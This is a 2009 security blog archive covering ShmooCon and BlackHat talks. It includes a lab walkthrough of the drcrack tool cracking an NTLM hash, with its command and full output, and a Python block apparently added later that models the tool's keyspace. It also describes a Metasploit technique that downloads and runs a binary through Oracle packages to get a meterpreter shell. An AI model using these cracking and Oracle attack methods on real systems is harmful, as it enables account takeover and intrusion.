Plus it's less "magic" when I say I cracked the passwords versus just passing the hash; passing the hash still seems to be magic to a lot of people. Plus, as Matt Carpenter pointed out to me, you can't log into Terminal Services/RDP with a hash :-)

So I went to the website and downloaded the .tar, extracted, and typed make all and got the following error.

cg@notBT:~/evil/drcrack/shmoocon_submit$ make all
make: *** No rule to make target `Public.o', needed by `drtgen'. Stop.

The issue ended up being public.cpp, which needed to be named Public.cpp. Rename the file and you should be good to go.

You can run ./dr_rules to alter either the basic_rules file or the keyboard_rules file but to get started I just used the default keyboard rules, dictionary, and table that they generated.

I changed a password in a VM to a keyboard combo (but still a 10 character password) that I was sure was in the dictionary and dumped the hashes.

Then I ran the tool (usage was here):

cg@notBT:~/evil/drcrack/shmoocon_submit$ ./drcrack -d /home/cg/evil/drcrack/keyboard_basic/keyboard_map.cfg -h 0D757AD173D2FC249CE19364FD64C8EC
Processing mangling rules
special=[>!@#$%^&*()_+\-=?.,/\\":; ] size=26
lower=[abcdefghijklmnopqrstuvwxyz] size=26
number=[0123456789] size=10
Reading in the dictionary
Dictionary Size = 658
Calculating rule and index size
Figuring out Rule Size
Index Size for rule 0 is=658
Index Size for rule 1 is=432964
Index Size for rule 2 is=284890312
the total Size=285323934
reading chunk...
83888 bytes read, disk access time: 0.00 s
verifying the file...
searching for 1 hash...
cryptanalysis time: 6.93 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.25 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.38 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.12 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.04 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.14 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.02 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.01 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.06 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.17 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.70 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.05 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.22 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
cryptanalysis time: 0.03 s
reading chunk...
83888 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 0d757ad173d2fc249ce19364fd64c8ec is qwertyuiop
cryptanalysis time: 0.03 s

plaintext found: 1 of 1 (100.00%)
total disk access time: 0.00 s
total cryptanalysis time: 9.40 s
total chain walk step: 2876401
total false alarm: 1451
total chain walk step due to false alarm: 1253346

0d757ad173d2fc249ce19364fd64c8ec qwertyuiop hex:71776572747975696f70

Overall not bad, in less than 10 seconds I found a password that would have been in a pretty big NTLM table otherwise.
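To see why the run above finishes in seconds, here is an added example (my code, not drcrack's) that models the index space drcrack prints: the 658-word dictionary with rules 0 through 2 gives 658, 658^2 and 658^3 candidates, and a reduction function maps any index in that space back to a concatenation of dictionary words. SAMPLE_WORDS is a constructed stand-in for the keyboard dictionary, which is not on the page.

```python
import math

# Constructed stand-in for drcrack's keyboard_map.cfg dictionary (not on the page).
SAMPLE_WORDS = ["qwerty", "uiop", "asdf", "zxcv", "1234"]
DRCRACK_DICT_SIZE = 658   # "Dictionary Size = 658" in the run above
DRCRACK_MAX_RULE = 2      # rules 0..2 reported in the run above


def rule_index_size(dict_size, rule):
    """Rule r concatenates r+1 dictionary words, so it has dict_size**(r+1) candidates."""
    return dict_size ** (rule + 1)

def total_index_size(dict_size, max_rule):
    """Total candidates covered by rules 0..max_rule (drcrack's 'total Size')."""
    return sum(rule_index_size(dict_size, r) for r in range(max_rule + 1))

def index_to_candidate(index, words, max_rule):
    """Map an integer in [0, total) to the candidate password it stands for.

    This is the plaintext side of a rainbow-table reduction function: indices are
    laid out rule by rule (all 1-word candidates, then all 2-word ones, ...), and
    within a rule the index is a base-len(words) number selecting each word.
    """
    d = len(words)
    if not 0 <= index < total_index_size(d, max_rule):
        raise ValueError("index outside the table's keyspace")
    for rule in range(max_rule + 1):
        size = rule_index_size(d, rule)
        if index < size:
            parts = []
            for _ in range(rule + 1):       # peel off least-significant word first
                parts.append(words[index % d])
                index //= d
            return "".join(reversed(parts))
        index -= size

def candidate_to_index(candidate_words, words):
    """Inverse of index_to_candidate for a known word split (round-trip check)."""
    d = len(words)
    offset = sum(rule_index_size(d, r) for r in range(len(candidate_words) - 1))
    idx = 0
    for w in candidate_words:
        idx = idx * d + words.index(w)
    return offset + idx

def effective_bits(dict_size, max_rule):
    """log2 of the keyspace: how many bits of a random password the whole table equals."""
    return math.log2(total_index_size(dict_size, max_rule))
```

The whole 285,323,934-candidate space is about 28 bits, less than a random 6-character alphanumeric password (36^6, about 31 bits), which is why a 10-character keyboard walk like qwertyuiop falls in seconds and why password policies should count dictionary words, not characters.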

I'm sure more posts are forthcoming...

Friday, February 13, 2009

BlackHat D.C. picks

Still recovering from shoulder surgery and have been checking out the BlackHat D.C. agenda. Unlike last year for BlackHat USA, I actually have a ticket this year so it's not just wishful thinking. So here's what I plan on checking out.

Day 1

10:00 - 11:15
Reversing and Exploiting Wireless Sensors
Travis Goodspeed

Toss up between

11:30 - 12:45
Windows Vista Security Internals
Michael Muckin


11:30 - 12:45
Let Your Mach-O Fly
Vincenzo Iozzo

Will probably decide on which one has seats that don't suck.

13:45- 15:00
Attacking Intel® Trusted Execution Technology
Joanna Rutkowska and Rafal Wojtczuk

15:15 - 16:30
A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage
Michael Sutton

16:45 - 18:00
SQL Server Anti-Forensics
Cesar Cerrudo

Day 2

09:00 - 09:50
Dissecting Web Attacks
Val Smith and Colin Ames

10:00 - 11:15
Don't know yet, probably the Flash one

11:30 - 12:45
Defending Your DNS in a Post-Kaminsky World
Paul Wouters

13:45 - 15:00
Don't know yet, probably the Tor one

15:15 - 16:30
The Forensic Investigation of a Compromised Oracle Database Server

David Litchfield

16:45 - 18:00
Snort My Memory
Peter Silberman

Is there a talk better than what I picked? Let me know!

Monday, February 9, 2009

Shmoo & the 'con within a con'

DC is a blast as always! Hanging and catching up with everyone is always a good time. I met a bunch of folks for the first time too, put names to faces and saw a lot of old friends too.

I'm not going to give a review or opinion of any of the presentations as cg has already done that. I really did not attend that many either to be honest. :) It's becoming more and more apparent to me that the true value of the cons are in the opportunity to network and bounce ideas off your peers.

Walking around I saw small clusters of people everywhere, all talking and sharing ideas and information. A group of us all got together in one of the hotel rooms. A few of the guys broke out their laptops and showed some research and work that by far was the coolest stuff I saw the whole weekend. cg redid his Oracle stuff and it was really cool to brainstorm and come up with ideas to extend the apps, concepts and PoCs that were presented by everyone.

I'm sure that we were not the only guys that were doing this too. These 'cons within cons' are, in my view, a great byproduct of the con itself and I'm looking forward to the next one for that reason alone.
dean de beer

Sunday, February 8, 2009

Oracle FTP Script Write/Binary Download/Execute via Oracle Packages Video

Metasploit Auxiliary module for Oracle FTP Script Write/Binary Download/Execute via Oracle Packages.

As DBA (yay for SQLi) we use UTL_FILE to write out our FTP download script; using DBMS_SCHEDULER we create a job to run the script to download our binary and create a 2nd job to execute our binary and get our meterpreter shell. Oracle...Unbreakable.

I got the "how to do it" from Red-Database-Security

Check MC's video (requires Java) on getting those DBA privs on an 11g box.

No code yet unless you email me and say you'll actually test it. Right now it's in the "works for me" status, but if you want to try it out on some other Oracle versions give me a shout. It won't work on 9 but should work on 10 & 11.

Metasploit Auxiliary module for Oracle FTP Script Write/Binary Download/Execute via Oracle Packages from carnal0wnage on Vimeo.

Shmoocon Day 2 & 3

Shmoocon is over, according to twitter good times were had by all.

I missed a few talks I wanted to see due to it being too crowded in a lot of them and also me not getting my butt in gear on Saturday morning.

So what I did catch.

Zero_Chaos' talk on 802.11 ObgYn or "Spread Your Spectrum" was about his updated drivers to open up some wifi ranges that were not accessible only because of software driver limitations. Very good talk.

Enno Rey and Daniel Mende's talk on All your packets are belong to us - Attacking backbone technologies was interesting, but I had to leave part of the way through.

I unfortunately missed Dave Kennedy's talk on Fast-track that I really wanted to see.

Sunday morning I caught Matt Weir's Enough with the Insanity: Dictionary Based Rainbow Tables. He talked about optimizing the rainbow crack code to be able to do some "smart" rainbow table generation. Tool site: & blog

Lastly, Chris Paget completely demoralized Electronic Driver's Licenses and US Passport Cards, I mean slapped around, spanked, sent to bed without dinner. Great presentation. Really laid out all the reasons the technology is wrong for what they are trying to do and how really, really wrong the implementation is...ouch.

On other fronts, Dean was there so it's always good to hang with Dean. I redid the Oracle talk in my room to some people and got some really good feedback and some things to work on for future functionality.

I also got to put tons of faces to names so shout outs to all the people that I met at shmoo for the first time (too many to list).

Saturday, February 7, 2009

ShmooCon Day 1 wrap up

So quick wrap up on Day 1.

The only talks I caught were the end of the smart key one, which seemed cool and the Watching the Watchers one by the cadets. It was good, not overly technical, but still good.

Did lots of chatting with old friends and met some new ones, which is always good. It's always nice to turn names into faces.

ShmooCon Firetalk on Attacking Oracle with the Metasploit Framework went pretty well. It's hard to look at everyone when you are in a circle and there was no mic, so I pretty much had no voice by the end of it, but I think it went pretty well and I got some good feedback and questions from some people in the audience after. The demo video is posted.

Jack Daniel talked about FOI, Failure On Investment as the only measure people are using to actually measure anything security related, which is true but is also why most senior security professionals in the US make 6 figures, you get paid enough to educate and push through those types of issues.

I didn't catch the name for the guy after Jack, but he talked about how PowerPoint has removed the ability for people to tell a story and other standard Tufte quotes. I've had similar discussions with Michael from Security Catalyst. Again I don't disagree, but there are times for PowerPoint and if PowerPoint rules are applied a presentation can be tolerable. The common counter for PowerPoint is to just hand out the slides with notes or whatever. That works great for a presentation to 10 people at work but certainly doesn't scale to a security conference. I like slides for people that do talks at security conferences that actually have content in the slides. Slides that consist of pictures of a lock, turtle, toilet, cigarette, and a trash can probably make/made perfect sense for the people who were actually sitting in the crowd, but if all I get is the slides later it doesn't mean crap. I don't see how I could have pulled off my talk without PowerPoint; it's hard to talk about code or see the output from Metasploit without actually showing it. But comments always welcome.

Ok, that is all for now...trying to get g0ne up and moving from his house so we can head back into D.C. for the talks today.

Attacking Oracle with Metasploit ShmooCon Firetalk Demo

Here is the video from my Attacking Oracle with the Metasploit Framework ShmooCon Firetalk.

Attacking Oracle with the Metasploit Framework Shmoocon Firetalk Demo Video from carnal0wnage on Vimeo.

Wednesday, February 4, 2009

Pentoo Updates

Blah blah BT4 blah blah your mom goes to college....

On other sweet distro fronts, some updates to Pentoo have arrived.

You can read about them here:

Support for GPU cracking is very cool. I'll ask grimmlin if I can post the link for the current alpha ISO for people to play with, and the rumor is a beta is coming soon!


ShmooCon Time!

ShmooCon is almost here and I'm excited to see old friends and meet/make new ones.

I'm currently scheduled to do a "Fire Talk" sometime between 2100-2200 on Friday night. I'll be talking for a few minutes on "Attacking Oracle with the Metasploit Framework" and I have a video demo to go with it. Hopefully it will whet the appetite to download the mixin and play/test with the code and make suggestions on features and functionality.

More info on the Fire Talks and other podcasting type stuff here:

I will of course be blogging and tweeting throughout the con.

See everyone this weekend!

New School Information Gathering Toorcon X Edition Video

I ripped the DVD from my talk at Toorcon X on New School Information Gathering.

Should be embedded below.

Toorcon X Gates: New School Information Gathering from carnal0wnage on Vimeo.

Sorry I don't have other videos and don't know when/if they will ever be released.

Tuesday, February 3, 2009

Identity Theft Protection Racket

Really good post on philosecurity on Identity Theft and the Protection Racket the Credit Card companies are running.

I tend to agree: if the credit card companies were really losing money, everyone would have credit alerts and locks for free, but right now, like data breaches, it's really the user's problem and not the credit card companies' or the people that lost the data.

Of real interest is that it mentions LifeLock got sued because it was issuing credit alerts on behalf of its customers.

"Last year Experian sued identity theft protection firm, LifeLock, for activating fraud alerts on behalf of hundreds of thousands of clients. Experian 'claimed that alerts should be entered only when people have already been victimized by identity theft or have legitimate reasons to believe that they are at imminent risk.' (Network World, 2008.) I've heard that 'identity theft occurs every 79 seconds.' Does that count?"